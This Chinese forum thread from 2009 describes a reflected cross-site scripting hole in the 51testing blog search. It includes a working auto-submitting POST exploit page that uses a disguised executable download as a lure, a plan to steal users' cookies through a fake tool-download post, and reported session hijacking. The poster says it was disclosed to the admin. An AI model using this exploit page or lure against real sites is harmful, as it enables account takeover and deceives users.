软件测试论坛 › [安全测试工具] › 关于51testing博客跨站漏洞的初探[原创]

ljdfdd 发表于 2009-12-8 18:34:02

关于51testing博客跨站漏洞的初探[原创]

来51testing很久了，在上面学到了很多有用的知识，最近也写了些文章与大家共同探讨一些问题，在使用博客空间的过程中，无意中发现博客存在跨站的漏洞，所以提出来希望管理人员能尽快修复，共同维护这个知识交流的平台，废话不多说了，进入正题

顺便进入任何一个人的博客，就以安全测试版块的斑竹的空间为例吧（老大别砸我：）），进入

http://www.51testing.com/?uid/59943

找到标题搜索一栏，输入<script>alert()</script>,点击提交，

http://www.51testing.com/attachments/2009/12/99915_200912081233181XVJz.thumb.jpg
直接弹出框

http://www.51testing.com/attachments/2009/12/99915_200912081236021sNVO.thumb.jpg
呵呵，是个潜在的xss跨站漏洞，有戏了，如果是get就好办了

开动工具，用fiddler抓地址，发现是post提交，直接用地址这条路看来行不通，

打开源码，发现这段代码

</div><div id="search" class="xspace-sideblock">
   <h3 class="xspace-blocktitle">标题搜索</h3>
   <form. id="form11" action="http://www.51testing.com/index.php?uid/99915/action/spacelist/php/1"

method="post">
   <input type="text" id="xspace-searchkey" name="searchkey" value=""/>
   <input type="hidden" name="searchsubmit" value="yes" />
   <input type="submit" name="xspace-dosearch" id="xspace-dosearch" value="搜索" />
   </form>

是直接提交到了http://www.51testing.com/index.php?uid/99915/action/spacelist/php/1这个地址，把此网页保存到本地，新建一个html文件,把以下代码copy进去

<html>
<div style="display:none">
<form. id="form11" name="form11" action="http://www.51testing.com/index.php?uid/99915/action/spacelist/php/1" method="post">
   <input type="text" id="xspace-searchkey" name="searchkey" value="<script>alert()</script>"/>
   <input type="hidden" name="searchsubmit" value="yes" />
   <input type="submit" name="xspace-dosearch" id="xspace-dosearch" value="搜索" />
   </form>
</div>
<script>
setTimeout("test()",200);
function test()
{
document.forms("form11").submit();
}
</script>
<iframe. border="0" height="0" width="0"

src="http://d31.v.iask.com/fs/800/1/83427b664b2f30577be522796757a8482258518/exe/GetFlash9.exe"

/>

</html>

上面代码实现三个功能，一，在文本里默认输入js代码，二，自动提交post,三，用一个下载地址掩盖跳转的真实意图

好了，现在把上面的iframe的地址写成工具的真实地址,把这个网页顺便传到一个免费空间，然后在论坛里开个新帖，某某工具最新版下载，然后把访问这个html的地址贴上去，用户用浏览器访问时，弹出工具的下载地址，在毫不知情的情况下，用户的cookie已在我们手中了，各位可能又要扔砖了，咋我只弹出一个框，呵呵，别急，上面text的value只有<script>alert()</script>，当然只弹出一个框，如果你自己再写个网页专门负责接收document.cookie，那用户的帐号是大把大把的送上来，有的同学又问，咋写那个接收的网页，呵呵，对不起，我只是个测试人员，只提供思路，关于上面的流程的可行性我已做过测试，截图如下

http://www.51testing.com/attachments/2009/12/99915_200912081336421HlPF.thumb.jpg
放入明小子修改cookie,登陆成功
http://www.51testing.com/attachments/2009/12/99915_200912081426471g7Y4.thumb.jpg
大家可能激动的赶快去尝试，呵呵，不好意思，在发表此文章之前，我已通知管理员修改了，我在这里只提供一个安全测试方面的测试思路，希望对大家有帮助:)

[ 本帖最后由 ljdfdd 于 2009-12-8 18:40 编辑 ]

男孩子 发表于 2009-12-9 15:41:12

不错，支持

男孩子 发表于 2009-12-9 15:45:34

51Testing的BBS的论坛，只拿到Cookie可能还登录不了，应该还有其它的限制条件。

我和版上上海的同学做过测试，他把他那边的Cookie给我，我在我这边不能登录。
但是我自己的机器，比如IE登录后，拿到Cookie，然后在FF上替换该Cookie，直接就登录成功了。

fishy 发表于 2009-12-9 16:38:16

呵呵，不错不错……
非常感谢你呢

suei8423 发表于 2010-1-4 15:20:16

哈哈，有意思哦，51testing本身不会做安全测试吗？

查看完整版本: 关于51testing博客跨站漏洞的初探[原创]